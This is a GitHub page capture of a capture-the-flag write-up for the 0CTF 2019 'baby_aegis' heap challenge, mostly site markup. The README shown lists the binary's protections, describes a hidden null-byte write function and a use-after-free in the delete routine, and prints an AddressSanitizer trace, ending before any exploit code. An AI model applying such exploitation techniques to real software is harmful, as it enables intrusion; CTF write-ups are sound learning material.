<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> agadient </span> <span>/</span> CTF
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>1</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>6</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/agadient/CTF/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":167091212,"originating_url":"https://github.com/agadient/CTF/tree/master/0ctf_2019/baby_aegis","user_id":null}}" data-hydro-click-hmac="b9f6066d661d452bcd468999bb37105ee8261523402a4974b5d23b7fad7b1b54"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/agadient/CTF/refs" cache-key="v0:1548205015.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="YWdhZGllbnQvQ1RG" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/agadient/CTF/refs" cache-key="v0:1548205015.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="YWdhZGllbnQvQ1RG" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>CTF</span></span></span><span>/</span><span><span>0ctf_2019</span></span><span>/</span>baby_aegis<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>CTF</span></span></span><span>/</span><span><span>0ctf_2019</span></span><span>/</span>baby_aegis<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/agadient/CTF/tree-commit/bec408be050277fe6d8272a53613f7b2424ef7fe/0ctf_2019/baby_aegis" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/agadient/CTF/file-list/master/0ctf_2019/baby_aegis"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>README</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>aegis.zip</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>aegis_exploit.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
<div id="readme" class="Box js-code-block-container js-code-nav-container js-tagsearch-file Box--responsive" data-tagsearch-path="0ctf_2019/baby_aegis/README" data-tagsearch-lang="">
<div class="d-flex Box-header border-bottom-0 flex-items-center flex-justify-between color-bg-default rounded-top-2" > <div class="d-flex flex-items-center"> <h2 class="Box-title"> README </h2> </div> </div>
<div data-target="readme-toc.content" class="Box-body "> <div class="plain">I want to give a shoutout to ghostly_grey for working with me to solve this chal. It was definitelya team effort and I don't know if either of us could have done it alone!
Now, the writeup. For this challenge, we are given a binary and libc. The binary has the following protections:
[*] '/home/a/Desktop/0ctf_2019/aegis/aegis' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled FORTIFY: Enabled ASAN: Enabled UBSAN: Enabled
Okay so besides the normal protections, the binary is protected by Address Sanitizer!! Getting past this defense is by far the most difficult part of the challenge.
From reversing the binary, we see that this is a standard heap challenge. You can create a note,update a note, delete a note, show a note, and exit. The notes are stored in a global array, and you can only allocate a maximum of 10.
___ ____ _____ _____ _______ ____ _____ _____ ____ ___ _ ___ / _ \ / ___|_ _| ___/ /_ _/ ___|_ _| ___| |___ \ / _ \/ |/ _ \| | | | | | | | |_ / / | || | | | | |_ __) | | | | | (_) || |_| | |___ | | | _/ / | || |___ | | | _| / __/| |_| | |\__, | \___/ \____| |_| |_|/_/ |_| \____| |_| |_| |_____|\___/|_| /_/
======Protected Notebook======1. Add note2. Show note3. Update note4. Delete note5. ExitChoice:
There is another function, secret, which allows you to write a nullbyte anywhere into memory. You can only use this function once and it can be accessed by putting the number "666" in the menu. It will prove essential for our exploit, but more on that later.
The first vulnerability that we found was a simple UAF. In the delete function,the note pointers are never nulled out like they should be. This allows usto access these pointers and overwrite data that has already been freed.
==4316==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000000010 at pc 0x555555668553 bp 0x7fffffffe310 sp 0x7fffffffe308READ of size 8 at 0x602000000010 thread T0 #0 0x555555668552 (/home/a/Desktop/0ctf_2019/aegis/aegis+0x114552) #1 0x555555668a6c (/home/a/Desktop/0ctf_2019/aegis/aegis+0x114a6c) #2 0x7ffff6e24b96 (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #3 0x55555556f8e9 (/home/a/Desktop/0ctf_2019/aegis/aegis+0x1b8e9)
